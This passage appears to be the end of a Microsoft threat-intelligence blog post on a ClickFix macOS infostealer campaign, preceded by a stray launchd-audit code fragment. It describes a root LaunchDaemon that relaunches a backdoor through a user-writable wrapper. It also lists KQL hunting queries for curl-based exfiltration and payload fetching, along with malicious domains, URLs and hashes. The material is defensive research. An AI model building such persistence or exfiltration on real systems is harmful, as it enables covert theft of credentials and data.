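                 make_plist("com.example.backup", ["/usr/local/bin/backup-agent", "--daemon"]))
```

On a live system, feed `audit()` every file under \/Library\/LaunchDaemons, \/Library\/LaunchAgents and each user's ~\/Library\/LaunchAgents; the root-runs-user-home check is the one that matters most here, because a daemon that executes a user-writable file gives the attacker root without ever having to touch a root-owned path again.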
Unlike _.mainhelper_, _.agent_ isn\u2019t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the _.mainhelper_ process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, _.agent_ relaunches it.\\n\\n#### LaunchDaemon installation (com.finder.helper.plist)\\n\\nAfter prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a _LaunchDaemon_ plist, stages the XML content to a temporary file (_\/tmp\/starter_), and then copies it to _\/Library\/LaunchDaemons\/com.finder.helper.plist_.\\n\\n#### LaunchDaemon plist staging and loading\\n\\nThe LaunchDaemon is configured to run _\/bin\/bash_ with the path to _~\/.agent_ as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets root ownership on the plist (launchd refuses to load a daemon whose plist isn\u2019t root-owned), loads the daemon using _launchctl_, and enables both RunAtLoad and KeepAlive.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-16.webp)Figure 24. Plist staging.\\n\\nAs a result, on every system boot, _launchd_ runs the _.agent_ wrapper with root privileges, which in turn ensures that the _.mainhelper_ backdoor process is running. Because the daemon runs as root while both _.agent_ and _.mainhelper_ live in the user\u2019s home directory, the attacker keeps root-level execution but only ever needs to modify user-writable files to change what runs.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-15.webp)Figure 25. Plist loading.\\n\\n## Mitigation and protection guidance\\n\\nApple XProtect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism. \\n\\n* * *\\n\\nWhen a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:\\n\\nPossible malware, Paste blocked\\n\\nYour Mac has not been harmed. 
Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.\\n\\n* * *\\n\\nOrganizations can also follow these recommendations to mitigate this threat:\\n\\n  * **Educate users.** Warn them against pasting commands from untrusted sources into Terminal, however helpful the page that offers them looks.\\n  * **Monitor Terminal usage.** Alert on suspicious Terminal or shell sessions spawned by installers or user apps.\\n  * **Detect native tool abuse.** Flag unusual sequences of macOS utilities (curl, base64, gunzip, osascript, and dscl).\\n  * **Inspect outbound downloads.** Monitor curl activity fetching encoded or compressed payloads from unknown domains.\\n  * **Protect credential stores.** Detect unauthorized access to Keychain items, browser data, SSH keys, and cloud credentials.\\n  * **Monitor data staging.** Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.\\n  * **Enable endpoint protection.** Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living\u2011off\u2011the\u2011land behavior.\\n  * **Restrict C2 traffic.** Block outbound connections to suspicious or newly registered domains.\\n\\n\\n\\nMicrosoft also recommends the following mitigations to reduce the impact of this threat.\\n\\n  * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.\\n  * Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\\n  * Allow investigation and remediation in full automated mode so that Defender for Endpoint can take immediate action on alerts to resolve breaches, significantly reducing alert volume.\\n  * Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to stop attackers from using local administrator privileges to set antivirus exclusions.\\n\\n\\n\\n## Microsoft Defender detections\\n\\nMicrosoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic**| **Observed activity**| **Microsoft Defender coverage**  \\n&#8212;|&#8212;|&#8212;  \\nExecution| User copies, pastes, and runs Base64 instructions; Base64 instructions are deobfuscated; executable files are created from the remote attacker\u2019s infrastructure; the installed malware implant is executed; malicious AppleScript is retrieved from attacker infrastructure; a sequence of malicious instructions is executed| **Microsoft Defender for Endpoint:** Suspicious shell command execution; Obfuscation or deobfuscation activity; Executable permission added to file or directory; Suspicious launchctl tool activity; &#8217;SuspMalScript&#8217; malware was prevented; Possible AMOS stealer activity; Suspicious AppleScript activity; Suspicious piped command launched; Suspicious file or information obfuscation detected. **Microsoft Defender Antivirus:** Trojan:MacOS\/Multiverze (created executable file); Trojan:MacOS\/SuspMalScript (malware implant downloaded by the loader campaign); Behavior:MacOS\/SuspAmosExecution (malicious file execution); Behavior:MacOS\/SuspOsascriptExec (malicious osascript execution); Behavior:MacOS\/SuspDownloadFileExec (suspicious file download and execution); Behavior:MacOS\/SuspiciousActiviyGen  \\nData collection| Malware collects data from bash history, browser credentials, and other sensitive folders; multiple files are collected into staging folders; collected data is staged and archived into a folder; staging folders are removed| **Microsoft Defender for Endpoint:** Suspicious access of sensitive files; Suspicious process collected data from local system; Enumeration of files with sensitive data; Suspicious archive creation; Suspicious path deletion. **Microsoft Defender Antivirus:** Behavior:MacOS\/SuspPassSteal (suspicious process collected data from local system); Trojan:MacOS\/SuspDecodeExec (malicious plist detection)  \\nDefense evasion| Malware deletes the staging paths following exfiltration; execution of obfuscated code to evade inspection| **Microsoft Defender for Endpoint:** Suspicious path deletion; Suspicious file or information obfuscation detected  \\nCredential access| Malware steals user account credentials and stages files for exfiltration| **Microsoft Defender for Endpoint:** Suspicious access of sensitive files; Unix credentials were illegitimately accessed  \\nExfiltration| Malware exfiltrates staged data using curl and HTTP POST| **Microsoft Defender for Endpoint:** Possible data exfiltration using curl. **Microsoft Defender Antivirus:** Behavior:MacOS\/SuspInfoExfil; Trojan:MacOS\/SuspMacSyncExfil  \\n  \\n### Threat intelligence reports\\n\\nMicrosoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender 
product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n### Microsoft Defender threat analytics\\n\\nFrom ClickFix to code signed: the quiet shift of MacSync Stealer malware.\\n\\nMicrosoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.\\n\\n## Hunting queries\\n\\n### Microsoft Defender\\n\\nMicrosoft Defender customers can run the following queries to find related activity in their networks:\\n\\n**Initial access**\\n    \\n    \\n    \/\/ Loader campaign installation\\n    DeviceNetworkEvents\\n    | where InitiatingProcessCommandLine has_any (\"loader.sh?build=\", \"payload.applescript?build=\")\\n    \\n    \/\/ Helper campaign installation\\n    DeviceFileEvents\\n    | where InitiatingProcessCommandLine has_all (\"curl\", \"\/tmp\/helper\", \"-o\")\\n    \\n    \/\/ Helper campaign, \/tmp\/update variant\\n    DeviceFileEvents\\n    | where InitiatingProcessCommandLine has_all (\"curl\", \"\/tmp\/update\", \"-o\")\\n    | where FileName == \"update\"\\n    \\n\\n**Exfiltration to C2 infrastructure**\\n    \\n    \\n    \/\/ Loader campaign\\n    DeviceProcessEvents\\n    | where ProcessCommandLine has_all (\"curl\", \"post\", \"\/debug\/event\", \"build_hash\")\\n    \\n    DeviceProcessEvents\\n    | where ProcessCommandLine  
has_all(\\\"curl\\\", \\\"\/tmp\\\", \\\"post\\\", \\\"-H\\\", \\\"-f\\\", \\\"build\\\", \\\"\/gate\\\")\\n    | where not (ProcessCommandLine has_any(\\\".claude\/shell-snapshots\\\"))\\n    \\n    \/\/ Script campaign\\n    \\n    DeviceNetworkEvents\\n    | where InitiatingProcessCommandLine has_all (\\\"curl\\\", \\\"-F\\\", \\\"txid\\\", \\\"zip\\\", \\\"max-time\\\")\\n    \\n    \/\/ Helper campaign\\n    DeviceProcessEvents\\n    | where InitiatingProcessCommandLine has_all (\\\"curl\\\", \\\"post\\\", \\\"-H\\\", \\\"user\\\", \\\"buildid\\\", \\\"cl\\\", \\\"cn\\\", \\\"\/tmp\/\\\")\\n    \\n\\n**Bot C2 installation and communication**\\n    \\n    \\n    \/\/ Loader campaign \u2013 bot install\\n    DeviceFileEvents\\n    | where InitiatingProcessCommandLine == \\\"base64 -d\\\"\\n    | where FolderPath endswith @\\\"Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/GoogleUpdate\\\"\\n    \\n    \/\/ Loader campaign \u2013 bot communication\\n    DeviceProcessEvents\\n    | where ProcessCommandLine has_all(\\\"\/api\/bot\/heartbeat\\\", \\\"post\\\", \\\"curl\\\")\\n    \\n    \/\/ Script campaign second stage execution\\n    DeviceProcessEvents\\n    | where ProcessCommandLine has_all(\\\"curl\\\", \\\"POST\\\", \\\"txid\\\", \\\"osascript\\\", \\\"bmodule\\\", \\\"max-time\\\")\\n    \\n    \/\/ Helper campaign \u2013 bot install\\n    \\n    \/\/ Alternate query for helper or bot update installation\\n    DeviceFileEvents\\n    | where InitiatingProcessCommandLine has_all (\\\"curl\\\", \\\"zxc\\\", \\\"kito\\\")\\n    \\n    DeviceProcessEvents\\n    | where InitiatingProcessFileName 
== \\\"osascript\\\"\\n    | where ProcessCommandLine has_all (\\\"sh\\\", \\\"echo\\\", \\\"-c\\\", \\\"cp\\\", \\\"\/tmp\/starter\\\", \\\".plist\\\")\\n    \\n\\n## Indicators of compromise\\n\\n### Domains distributing ClickFix\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\ncleanmymacos[.]org| Domain| Distribution of ClickFix instructions  \\nmac-storage-guide.squarespace[.]com| Domain| Distribution of ClickFix instructions  \\nclaudecodedoc[.]squarespace[.]com| Domain| Distribution of ClickFix instructions  \\ndomenpozh[.]net| Domain| Distribution of ClickFix instructions  \\nmacos-disk-space[.]medium[.]com| Domain| Distribution of ClickFix instructions  \\nmacclean[.]craft[.]me| Domain| Distribution of ClickFix instructions  \\napple-mac-fix-hidden[.]medium[.]com| Domain| Distribution of ClickFix instructions  \\n  \\n### Loader campaign\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\nrapidfilevault4[.]sbs| Domain| Payload delivery and C2  \\ncoco-fun2[.]com| Domain| Payload delivery and C2  \\nnitlebuf[.]com| Domain| Payload delivery and C2  \\nyablochnisok[.]com| Domain| Payload delivery and C2  \\nmentaorb[.]com| Domain| Payload delivery and C2  \\nseagalnssteavens[.]com| Domain| Payload delivery and C2  \\nres2erch-sl0ut[.]com| Domain| Payload delivery and C2  \\nfilefastdata[.]com| Domain| Payload delivery and C2  \\nmetramon[.]com| Domain| Payload delivery and C2  \\noctopixeldate[.]com| Domain| Payload delivery and C2  \\npewweepor092[.]com| Domain| Payload delivery and C2  \\nbulletproofdomai2n[.]com| Domain| Payload delivery and C2  \\nbenefasts-fhgs2[.]com| Domain| Payload delivery and C2  \\nrepqoow77wiqi[.]com| Domain| Payload delivery and C2  \\ndo2wers[.]com| Domain| Payload delivery and C2  \\nrapidfilevault4[.]cyou| Domain| Payload delivery and C2  \\nreews09weersus[.]com| Domain| Payload delivery and C2  
\\npepepupuchek13[.]com| Domain| Payload delivery and C2  \\npewqpeee888[.]com| Domain| Payload delivery and C2  \\nwewannaliveinpicede[.]com| Domain| Payload delivery and C2  \\ndatasphere[.]us[.]com| Domain| Payload delivery and C2  \\nrapidfilevault5[.]sbs| Domain| Payload delivery and C2  \\ncoco2-hram[.]com| Domain| Payload delivery and C2  \\npoeooeowwo777[.]com| Domain| Payload delivery and C2  \\nkorovkamu[.]com| Domain| Payload delivery and C2  \\nmetrikcs[.]com| Domain| Payload delivery and C2  \\nmetlafounder[.]com| Domain| Payload delivery and C2  \\nterafolt[.]com| Domain| Payload delivery and C2  \\nhaploadpin[.]com| Domain| Payload delivery and C2  \\nrawmrk[.]com| Domain| Payload delivery and C2  \\nmikulatur[.]com| Domain| Payload delivery and C2  \\nmilbiorb[.]com| Domain| Payload delivery and C2  \\ndoqeers[.]com| Domain| Payload delivery and C2  \\nwe2luck[.]com| Domain| Payload delivery and C2  \\nquantumdataserver5[.]homes| Domain| Payload delivery and C2  \\nbintail[.]com| Domain| Payload delivery and C2  \\nmolokotarelka[.]com| Domain| Payload delivery and C2  \\ntrehlub[.]com| Domain| Payload delivery and C2  \\navafex[.]com| Domain| Payload delivery and C2  \\nrhymbil[.]com| Domain| Payload delivery and C2  \\nboso6ka[.]com| Domain| Payload delivery and C2  \\nres2erch-sl2ut[.]com| Domain| Payload delivery and C2  \\npilautfile[.]com| Domain| Payload delivery and C2  \\nbigbossbro777[.]com| Domain| Payload delivery and C2  \\nmiappl[.]com| Domain| Payload delivery and C2  \\npeloetwq71[.]com| Domain| Payload delivery and C2  \\nfastfilenext[.]com| Domain| Payload delivery and C2  \\nberansraol[.]com| Domain| Payload delivery and C2  \\npelorso90la[.]com| Domain| Payload delivery and C2  \\nmedoviypirog[.]com| Domain| Payload delivery and C2  \\nwewannaliveinpice[.]com| Domain| Payload delivery and C2  \\nmalkim[.]com| Domain| Payload delivery and C2  \\npipipoopochek6[.]com| Domain| Payload delivery and C2  \\nhello-brothers777[.]com| 
Domain| Payload delivery and C2  \\ndialerformac[.]com| Domain| Payload delivery and C2  \\npersaniusdimonica8[.]com| Domain| Payload delivery and C2  \\nhilofet[.]com| Domain| Payload delivery and C2  \\ntmcnex[.]com| Domain| Payload delivery and C2  \\nnibelined[.]com| Domain| Payload delivery and C2  \\npissispissman[.]com| Domain| Payload delivery and C2  \\nbankafolder[.]com| Domain| Payload delivery and C2  \\nperewoisbb0[.]com| Domain| Payload delivery and C2  \\nus41web[.]live| Domain| Payload delivery and C2  \\nuk176video[.]live| Domain| Payload delivery and C2  \\njihiz[.]com| Domain| Payload delivery and C2  \\nbeltoxer[.]com| Domain| Payload delivery and C2  \\nswift-sh[.]com| Domain| Payload delivery and C2  \\nhitkrul[.]com| Domain| Payload delivery and C2  \\nkofeynayagush[.]com| Domain| Payload delivery and C2  \\n  \\n### Script campaign\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\nhxxps:\/\/cauterizespray[.]icu\/script[.]sh| URL| Payload delivery  \\nhxxps:\/\/enslaveculprit[.]digital\/script[.]sh| URL| Payload delivery  \\nhxxps:\/\/resilientlimb[.]icu\/script[.]sh| URL| Payload delivery  \\nhxxps:\/\/thickentributary[.]digital\/script[.]sh| URL| Payload delivery  \\nhxxp:\/\/paralegalmustang[.]icu\/script[.]sh| URL| Payload delivery  \\nhxxps:\/\/round5on[.]digital\/script[.]sh| URL| Payload delivery  \\nhxxps:\/\/qjywvkbl[.]degassing-mould[.]digital| URL| Payload delivery  \\nhxxps:\/\/zg5mkr7q[.]apexharvestor[.]digital| URL| Payload delivery  \\nhxxps:\/\/kvrnjr30[.]apexharvestor[.]digital| URL| Payload delivery  \\nhxxps:\/\/yygp4pdh[.]apexharvestor[.]digital| URL| Payload delivery  \\nhxxps:\/\/t[.]me\/ax03bot| URL| Payload delivery  \\n0x666[.]info| Domain| Payload delivery, C2, and exfiltration  \\nhonestly[.]ink| Domain| Payload delivery, C2, and exfiltration  \\n95.85.251[.]177| IP 
address| Payload delivery, C2, and exfiltration  \\npla7ina[.]cfd| Domain| Payload delivery, C2, and exfiltration  \\nplay67[.]cc| Domain| Payload delivery, C2, and exfiltration  \\n  \\n### Helper campaign\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\nrvdownloads[.]com| Domain| Payload delivery  \\nfamiode[.]com| Domain| Payload delivery  \\ncontatoplus[.]com| Domain| Payload delivery  \\nwoupp[.]com| Domain| Payload delivery  \\nsaramoftah[.]com| Domain| Payload delivery  \\nptrei[.]com| Domain| Payload delivery  \\nwriconsult[.]com| Domain| Payload delivery  \\nkayeart[.]com| Domain| Payload delivery  \\nejecen[.]com| Domain| Payload delivery  \\nstinarosen[.]com| Domain| Payload delivery  \\nbiopranica[.]com| Domain| Payload delivery  \\nraxelpak[.]com| Domain| Payload delivery  \\noctopox[.]com| Domain| Payload delivery  \\nboosterjuices[.]com| Domain| Payload delivery  \\nftduk[.]com| Domain| Payload delivery  \\ndryvecar[.]com| Domain| Payload delivery  \\nvcopp[.]com| Domain| Payload delivery  \\nkcbps[.]com| Domain| Payload delivery  \\njpbassin[.]com| Domain| Payload delivery  \\nisgilan[.]com| Domain| Payload delivery  \\narkypc[.]com| Domain| Payload delivery  \\nhacelu[.]com| Domain| Payload delivery  \\nstclegion[.]com| Domain| Payload delivery  \\nxeebii[.]com| Domain| Payload delivery  \\nhxxp:\/\/138.124.93[.]32\/contact| URL| Exfiltration endpoint  \\nhxxp:\/\/168.100.9[.]122\/contact| URL| Exfiltration endpoint  \\nhxxp:\/\/199.217.98[.]33\/contact| URL| Exfiltration endpoint  \\nhxxp:\/\/38.244.158[.]103\/contact| URL| Exfiltration endpoint  \\nhxxp:\/\/38.244.158[.]56\/contact| URL| Exfiltration endpoint  \\nhxxp:\/\/92.246.136[.]14\/contact| URL| Exfiltration endpoint  \\nhxxps:\/\/avipstudios[.]com\/contact| URL| Exfiltration endpoint  \\nhxxps:\/\/joytion[.]com\/contact| URL| Exfiltration 
endpoint  \\nhxxps:\/\/laislivon[.]com\/contact| URL| Exfiltration endpoint  \\nhxxps:\/\/mpasvw[.]com\/contact| URL| Exfiltration endpoint  \\nhxxps:\/\/lakhov[.]com\/contact| URL| Exfiltration endpoint  \\n  \\n### Update campaign infrastructure\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\nreachnv[.]com| Domain| Delivery of the update install variant of the helper campaign  \\nvagturk[.]com| Domain| Delivery of the update install variant of the helper campaign  \\nfutampako[.]com| Domain| Delivery of the update install variant of the helper campaign  \\noctopox[.]com| Domain| Delivery of the update install variant of the helper campaign  \\nlbarticle[.]com| Domain| Delivery of the update install variant of the helper campaign  \\nraytherrien[.]com| Domain| Delivery of the update install variant of the helper campaign  \\njoeyapple[.]com| Domain| Delivery of the update install variant of the helper campaign  \\n  \\n### Persistence and bot execution\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\n45.94.47[.]204| IP address| Bot communication IP address  \\nwusetail[.]com| Domain| Hosting bot payload  \\naforvm[.]com| Domain| Hosting bot payload  \\nouilov[.]com| Domain| Hosting bot payload  \\nmalext[.]com| Domain| Hosting bot payload  \\nrebidy[.]com| Domain| Hosting bot payload  \\n  \\n### Payloads\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\n9d2da07aa6e7db3fbc36b36f0cfd74f78d5815f5ba55d0f0405cdd668bd13767| SHA-256| Payload  \\n7ca42f1f23dbdc9427c9f135815bb74708a7494ea78df1fbc0fc348ba2a161ae| SHA-256| Payload  \\n241a50befcf5c1aa6dab79664e2ba9cb373cc351cb9de9c3699fd2ecb2afab05| SHA-256| Payload  \\n522fdfaff44797b9180f36c654f77baf5cdeaab861bbf372ccfc1a5bd920d62e| SHA-256| Payload  \\n  \\n### File indicators of attack\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  
\\n\/tmp\/helper| Folder path| Malware staging  \\n\/tmp\/starter| Folder path| Malware plist staging  \\n~\/Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/GoogleUpdate| Folder path| Malicious file masquerading as Google Update component  \\n~\/LaunchAgents\/com.google.keystone.agent.plist| Plist name| Staged plist running malicious executable  \\n~\/Library\/LaunchAgents\/com.\\u003crandom value\\u003e.plist| Plist name| Staged plist running malicious executable  \\n  \\n# References\\n\\n  * Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets. Malwarebytes Labs (published 2026-03-06)\\n  * Malvertising Campaign Spreads AMOS \u2018malext\u2019 macOS Infostealer via Fake Text-Sharing Ads. GBHackers (published 2026-03-03)\\n  * ClickFix Is Targeting Mac Users Through Google Ads and Fake AI Guides. IzooLogic (published 2026-02-18)\\n  * Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT. Elastic Security (published 2026-04-13)\\n  * https:\/\/www.iru.com\/blog\/atomic-stealer-amos-returns (published 2026-03-31)\\n\\n\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and members of Microsoft Threat Intelligence._\\n\\n# Learn more\\n\\n  * For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n  * To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n  * To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.\\n\\n\\n\\nThe post ClickFix campaign uses fake macOS utilities lures to deliver infostealers appeared first on Microsoft Security 
Blog.&#8221;,&#8221;published&#8221;:&#8221;2026-05-06T15:20:32&#8243;,&#8221;modified&#8221;:&#8221;2026-05-06T15:20:32&#8243;,&#8221;type&#8221;:&#8221;mssecure&#8221;,&#8221;title&#8221;:&#8221;ClickFix campaign uses fake macOS utilities lures to deliver infostealers&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSSECURE:B9774A5238ABF9F8F6DE190012C0F965&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/06\/clickfix-campaign-uses-fake-macos-utilities-lures-deliver
-infostealers\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false}}